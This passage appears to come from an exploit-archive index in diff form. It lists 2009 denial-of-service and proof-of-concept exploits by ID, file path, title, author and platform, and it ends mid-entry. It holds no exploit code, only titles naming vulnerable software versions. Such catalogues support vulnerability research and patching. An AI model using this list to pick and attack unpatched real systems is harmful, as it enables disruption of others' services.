+8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",dos,windows, +8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,dos,windows, +8148,exploits/multiple/dos/8148.pl,"Yaws < 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities",2009-03-03,"Praveen Darshanam",dos,multiple, +8156,exploits/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,dos,windows, +8163,exploits/bsd/dos/8163.txt,"Libc - 'libc:fts_*()' Local Denial of Service",2009-03-05,SecurityReason,dos,bsd, +8180,exploits/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",dos,windows, +8187,exploits/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,dos,hardware, +8190,exploits/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",dos,windows, +8205,exploits/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,dos,linux, +8212,exploits/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",dos,windows, +8213,exploits/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service",2009-03-16,TheLeader,dos,windows, +8219,exploits/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,dos,multiple, +8224,exploits/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,dos,windows, +8225,exploits/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,Encrypt3d.M!nd,dos,windows, +8232,exploits/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,dos,windows, +8241,exploits/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",dos,multiple, +8245,exploits/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",dos,multiple, +8259,exploits/freebsd/dos/8259.c,"FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service)",2009-03-23,kokanin,dos,freebsd, +8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware, +8262,exploits/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,dos,osx, +8263,exploits/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,dos,osx, +8264,exploits/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,dos,osx, +8265,exploits/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,dos,osx, +8281,exploits/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",dos,windows, +8285,exploits/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)",2009-03-25,"Guido Landi",dos,multiple, +8294,exploits/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",dos,windows, +8300,exploits/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,Encrypt3d.M!nd,dos,windows, +8306,exploits/windows/dos/8306.txt,"Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",dos,windows, +8308,exploits/multiple/dos/8308.c,"Wireshark 1.0.6 - PN-DCP Format String (PoC)",2009-03-30,"THCX Labs",dos,multiple, +8310,exploits/windows/dos/8310.pl,"Sami HTTP Server 2.x - 'HEAD' Remote Denial of Service",2009-03-30,"Jonathan Salwan",dos,windows, +8313,exploits/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",dos,hardware, +8314,exploits/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",dos,windows, +8320,exploits/multiple/dos/8320.py,"Opera 9.64 - 7400 nested elements XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",dos,multiple, +8325,exploits/windows/dos/8325.py,"Apple Safari 3.2.2/4b - nested elements XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",dos,windows, +8333,exploits/multiple/dos/8333.txt,"Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting",2009-03-31,"Core Security",dos,multiple, +8335,exploits/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",dos,windows, +8337,exploits/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,dos,multiple, +8344,exploits/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",dos,multiple, +8345,exploits/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",dos,multiple, +8352,exploits/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,dos,windows, +8356,exploits/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)",2009-04-06,DATA_SNIPER,dos,windows, +8358,exploits/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,dos,windows, +8360,exploits/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - 'usnf' Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,dos,windows, +8370,exploits/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",dos,windows, +8378,exploits/windows/dos/8378.pl,"SWF Opener 1.3 - '.swf' Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,dos,windows, +8390,exploits/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)",2009-04-10,"fl0 fl0w",dos,windows, +8391,exploits/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow (PoC)",2009-04-10,DSecRG,dos,windows, +8393,exploits/hardware/dos/8393.txt,"Cisco ASA/PIX - Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",dos,hardware, +8402,exploits/windows/dos/8402.pl,"Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows, +8403,exploits/windows/dos/8403.pl,"WM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows, +8404,exploits/windows/dos/8404.pl,"RM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows, +8405,exploits/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows, +8406,exploits/openbsd/dos/8406.txt,"OpenBSD 4.5 - IP datagrams Remote Denial of Service",2009-04-13,Rembrandt,dos,openbsd, +8407,exploits/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows, +8429,exploits/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,dos,multiple, +8430,exploits/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,dos,openbsd, +8434,exploits/windows/dos/8434.html,"PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,dos,windows, +8445,exploits/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,dos,windows, +8447,exploits/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,dos,windows, +8451,exploits/windows/dos/8451.pl,"Apollo 37zz - '.m3u' Local Heap Overflow (PoC)",2009-04-16,Cyber-Zone,dos,windows, +8452,exploits/windows/dos/8452.c,"Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)",2009-04-16,"fl0 fl0w",dos,windows, +8462,exploits/windows/dos/8462.pl,"MagicISO CCD/Cue - Local Heap Overflow (PoC)",2009-04-16,Stack,dos,windows, +8465,exploits/windows/dos/8465.pl,"Microsoft Media Player - 'quartz.dll .mid' Denial of Service",2009-04-17,"Code Audit Labs",dos,windows, +8466,exploits/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",dos,windows, +8467,exploits/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",dos,windows, +8469,exploits/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",dos,linux, +8479,exploits/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)",2009-04-20,Skylined,dos,windows, +8484,exploits/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, +8485,exploits/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, +8489,exploits/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, +8490,exploits/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,dos,hardware, +8500,exploits/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service",2009-04-21,shinnai,dos,windows, +8507,exploits/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)",2009-04-21,"Dennis Yurichev",dos,windows, +8511,exploits/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",dos,windows, +8512,exploits/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash",2009-04-22,M4rt1n,dos,windows, +8522,exploits/windows/dos/8522.pl,"Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service",2009-04-22,"Jonathan Salwan",dos,windows, +8523,exploits/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,dos,windows, +8524,exploits/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - GUI Thread-Memory Corruption",2009-04-23,Aodrulez,dos,windows, +8526,exploits/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,dos,windows, +8531,exploits/windows/dos/8531.pl,"SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)",2009-04-24,Cyber-Zone,dos,windows, +8542,exploits/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)",2009-04-27,Nine:Situations:Group,dos,windows, +8544,exploits/linux/dos/8544.pl,"iodined 0.4.2-2 - forged DNS packet Denial of Service",2009-04-27,"Albert Sellares",dos,linux, +8568,exploits/windows/dos/8568.pl,"mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)",2009-04-29,GoLd_M,dos,windows, +8573,exploits/windows/dos/8573.html,"Google Chrome 1.0.154.53 - Null Pointer Remote Crash",2009-04-30,"Aditya K Sood",dos,windows, +8578,exploits/windows/dos/8578.pl,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)",2009-04-30,SirGod,dos,windows, +8581,exploits/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,dos,bsd, +8584,exploits/hardware/dos/8584.py,"Addonics NAS Adapter FTP - Remote Denial of Service",2009-05-01,h00die,dos,hardware, +8588,exploits/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)",2009-05-01,SirGod,dos,windows, +8597,exploits/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,dos,solaris, +8598,exploits/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - 'fasttrap' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,dos,solaris, +8601,exploits/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,dos,windows, +8606,exploits/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,dos,windows, +8607,exploits/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,dos,windows, +8611,exploits/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",dos,win_x86, +8617,exploits/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,dos,windows, +8625,exploits/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,dos,windows, +8644,exploits/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,dos,windows, +8646,exploits/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet - Denial of Service",2009-05-08,ikki,dos,multiple, +8650,exploits/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",dos,windows, +8665,exploits/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,dos,windows, +8669,exploits/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service Vulnerabilities (PoC)",2009-05-13,mu-b,dos,multiple, +8677,exploits/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)",2009-05-14,SirGod,dos,windows, +8695,exploits/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",dos,multiple, +8712,exploits/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,dos,windows, +8720,exploits/multiple/dos/8720.c,"OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",dos,multiple, +8721,exploits/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC)",2009-05-18,Stack,dos,windows, +8722,exploits/windows/dos/8722.py,"Mereo 1.8.0 - GET Remote Denial of Service",2009-05-18,Stack,dos,windows, +8767,exploits/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,dos,windows, +8777,exploits/windows/dos/8777.txt,"Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié",dos,windows, +8794,exploits/multiple/dos/8794.html,"Mozilla Firefox - unclamped loop Denial of Service",2009-05-26,"Thierry Zoller",dos,multiple, +8798,exploits/windows/dos/8798.rb,"Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC)",2009-05-26,"Kevin Finisterre",dos,windows, +8822,exploits/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - 'KEYGEN' Remote Denial of Service",2009-05-29,"Thierry Zoller",dos,multiple, +8826,exploits/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",dos,multiple, +8832,exploits/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,dos,windows, +8837,exploits/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,dos,windows, +8842,exploits/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,dos,multiple, +8862,exploits/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,dos,windows, +8873,exploits/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",dos,multiple, +8899,exploits/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,dos,windows, +8940,exploits/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",dos,multiple, +8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,dos,linux, +8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",dos,multiple, +8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,dos,linux, +8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware, +8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,dos,windows, +8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,dos,multiple, +8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,dos,linux, +8991,exploits/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,dos,multiple, +9006,exploits/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service",2009-06-23,Nibin,dos,windows, +9007,exploits/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service (Metasploit)",2009-06-23,Nibin,dos,windows, +9029,exploits/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)",2009-06-29,Trancer,dos,windows, +9033,exploits/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,dos,windows, +9061,exploits/windows/dos/9061.pl,"PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)",2009-07-01,"ThE g0bL!N",dos,windows, +9067,exploits/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Remote Denial of Service",2009-07-01,Stack,dos,hardware, +9071,exploits/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,dos,multiple, +9084,exploits/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",dos,windows, +9085,exploits/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,dos,multiple, +9090,exploits/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,dos,windows, +9100,exploits/windows/dos/9100.html,"Microsoft Internet Explorer - 'AddFavorite' Remote Crash (PoC)",2009-07-09,Sberry,dos,windows, +9102,exploits/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,dos,windows, +9113,exploits/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)",2009-07-10,Stack,dos,windows, +9114,exploits/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,dos,windows, +9116,exploits/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,dos,windows, +9123,exploits/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",dos,windows, +9124,exploits/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",dos,windows, +9131,exploits/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,dos,windows, +9133,exploits/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,dos,windows, +9134,exploits/freebsd/dos/9134.c,"FreeBSD 6/8 - ata Device Local Denial of Service",2009-07-13,"Shaun Colley",dos,freebsd, +9139,exploits/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,dos,windows, +9141,exploits/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",dos,windows, +9147,exploits/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,dos,windows, +9157,exploits/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)",2009-07-15,"ThE g0bL!N",dos,windows, +9158,exploits/windows/dos/9158.html,"Mozilla Firefox 3.5 - Unicode Remote Buffer Overflow (PoC)",2009-07-15,"Andrew Haynes",dos,windows, +9160,exploits/multiple/dos/9160.txt,"Multiple Browsers - Denial of Service",2009-07-15,"Thierry Zoller",dos,multiple, +9163,exploits/windows/dos/9163.txt,"Microsoft Office Web Components (OWC) Spreadsheet - ActiveX Buffer Overflow (PoC)",2009-07-16,anonymous,dos,windows, +9167,exploits/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 - Remote Buffer Overflow (PoC)",2009-07-16,LiquidWorm,dos,windows, +9168,exploits/windows/dos/9168.pl,"Zortam MP3 Player 1.50 - '.m3u' Integer Division by Zero",2009-07-16,LiquidWorm,dos,windows, +9169,exploits/windows/dos/9169.txt,"Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities",2009-07-16,LiquidWorm,dos,windows, +9170,exploits/windows/dos/9170.txt,"Audio Editor Pro 2.91 - Remote Memory Corruption (PoC)",2009-07-16,LiquidWorm,dos,windows, +9173,exploits/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)",2009-07-16,hack4love,dos,windows, +9175,exploits/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,dos,multiple, +9178,exploits/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,dos,windows, +9189,exploits/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",dos,windows, +9192,exploits/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",dos,windows, +9198,exploits/multiple/dos/9198.txt,"Real Helix DNA - 'RTSP' / 'SETUP' Request Handler",2009-07-17,"Core Security",dos,multiple, +9200,exploits/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,dos,windows, +9206,exploits/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",dos,freebsd, +9212,exploits/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,dos,windows, +9213,exploits/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",dos,windows, +9220,exploits/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,dos,windows, +9222,exploits/windows/dos/9222.cpp,"FlyHelp - '.CHM' Local Buffer Overflow (PoC)",2009-07-21,"fl0 fl0w",dos,windows, +9228,exploits/windows/dos/9228.pl,"otsAV 1.77.001 - '.ofl' Local Heap Overflow (PoC)",2009-07-22,hack4love,dos,windows, +9240,exploits/windows/dos/9240.py,"OpenH323 Opal SIP Protocol - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",dos,windows, +9241,exploits/windows/dos/9241.py,"Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",dos,windows, +9242,exploits/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",dos,windows, +9253,exploits/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash",2009-07-24,Hong10,dos,windows, +9264,exploits/linux/dos/9264.py,"stftp 1.10 - PWD Response Remote Stack Overflow (PoC)",2009-07-27,sqlevil,dos,linux, +9265,exploits/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow (PoC)",2009-07-27,"Jon Oberheide",dos,linux, +9268,exploits/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",dos,hardware, +9277,exploits/windows/dos/9277.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (PoC)",2009-07-27,hack4love,dos,windows, +9295,exploits/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",dos,windows, +9300,exploits/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,dos,multiple, +9304,exploits/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash",2009-07-30,LiquidWorm,dos,windows, +9317,exploits/windows/dos/9317.c,"Google SketchUp Pro 7.0 - '.skp' Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,dos,windows, +9323,exploits/multiple/dos/9323.txt,"Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)",2009-08-01,"Tadas Vilkeliskis",dos,multiple, +9345,exploits/windows/dos/9345.pl,"RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)",2009-08-03,SkuLL-HackeR,dos,windows, +9359,exploits/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,dos,windows, +9361,exploits/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",dos,windows, +9362,exploits/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,dos,windows, +9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows, +9368,exploits/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)",2009-08-05,SarBoT511,dos,windows, +9373,exploits/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",dos,freebsd, +9376,exploits/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - '.M3U'/'.ASX'/'.WAX'/'.WVX' Local Crash (PoC)",2009-09-10,Dr_IDE,dos,windows, +9381,exploits/windows/dos/9381.py,"Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",dos,windows, +9382,exploits/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",dos,windows, +9392,exploits/windows/dos/9392.pl,"iRehearse - 